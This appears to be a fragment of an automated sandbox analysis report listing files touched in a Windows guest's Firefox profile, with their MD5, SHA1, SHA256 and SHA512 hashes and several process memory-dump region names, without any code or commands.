| SHA512 | 3f9238f924e2cf022bd4d9c9c151b85055cd969561304de47baec945754e4e7b63e00a5ec7cfb2344d9c71c4a75e9a0d7f0c4fa16a0707cef87619240e63c196 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\cache2\entries\ADF5BD09EB688DAB1F35EE02E8C35329D0E4AD89
| MD5 | f6bdd0d6e8b2933559ffbba6b877ec10 |
| SHA1 | 151ae40fe11b8cecf510210bc6dc09f2e6f064e8 |
| SHA256 | efc5bc696e5d7e08e5f58659d4cae4fd660678389c9ab4f17de9ce174d597554 |
| SHA512 | 2ddb4c48a337f4edecea6f78ead6a0116a9a0b4399f58d2f7347892f998c41fa295dff586bcd394fbaf569bc73ff96c8c037067b39f557a93a7433c3623870a1 |
memory/3144-1606-0x00000000027D0000-0x0000000002806000-memory.dmp
memory/3144-1607-0x0000000004FB0000-0x00000000055D8000-memory.dmp
memory/3144-1626-0x0000000005610000-0x0000000005632000-memory.dmp
memory/3144-1629-0x0000000005730000-0x0000000005796000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json
| MD5 | bf957ad58b55f64219ab3f793e374316 |
| SHA1 | a11adc9d7f2c28e04d9b35e23b7616d0527118a1 |
| SHA256 | bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda |
| SHA512 | 79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll
| MD5 | c71d75af8d0f8889d4709a98ecf876f5 |
| SHA1 | f3cba58335cf14086a092387dd32722b606b2006 |
| SHA256 | 8a0ca6866ec8eba35b72f86178f9ef958b2ad4a4471630324781ec72cf2babf3 |
| SHA512 | 71f4c974b03a899deb84101e85bf5112db4e5c59f09addf854c90dd1e5ba2cab3d8014cd668900657e4ae6228459617cb412136e0b7a95fc76b7d1e8a565ca0c |
memory/3144-1665-0x00000000057A0000-0x0000000005AF4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tmpaddon-1
| MD5 | d2303d182670507a56ef52e72937dd2e |
| SHA1 | 2fe438e399d0dc621ce59a23114dca8875ae86b0 |
| SHA256 | ca71e0255cf8cce40e65a86f4e96fab5e8593e30a183b38739276f02ceab96a8 |
| SHA512 | 72520c5edc8bf3e904faeaeaa245a082c231b97a5e443973763117b325bc9aa65aaff287b9fba54b912b5c8d95d940418c0e569fa7a0b89f9568bda380945316 |
memory/3144-1628-0x00000000056C0000-0x0000000005726000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
| MD5 | 7266db00c0486bc19357f7e9322e3605 |
| SHA1 | 726fc4a7f529b7e3bf8b06e5288eff0813c5d23b |
| SHA256 | b48a371936b11bec59a8848d78837e0f8da5a74746007f88b00819da84661010 |
| SHA512 | 67534a7d83607dfe3b9ffa398b6c4551039860a27e9d35f2aacf28a4ea78f3c60c97d7f6ce9f44ff0ec37d57142000ca7d398a734d9395f2c47184b19473a78a |
memory/3144-1709-0x0000000005DE0000-0x0000000005E2C000-memory.dmp
memory/3144-1702-0x0000000005DC0000-0x0000000005DDE000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
| MD5 | effaec199bfdce25de21a1f4612a9dec |
| SHA1 | a110d73b5df5bd3418ea0e5d26c75edfc5c0c0e3 |
| SHA256 | f385c2cee37e68b46680c455b151be6200b35041e4432c5dc79800efa6eefdd2 |
| SHA512 | 7f5a1ff06bb01e076b8d5756319c58b1efe54170dd3207b35316ed94a2533cfa4e96be6909dd4945564c6b974d55489cc0f3b9c35a4217aab8cb6b7ccfc3df1a |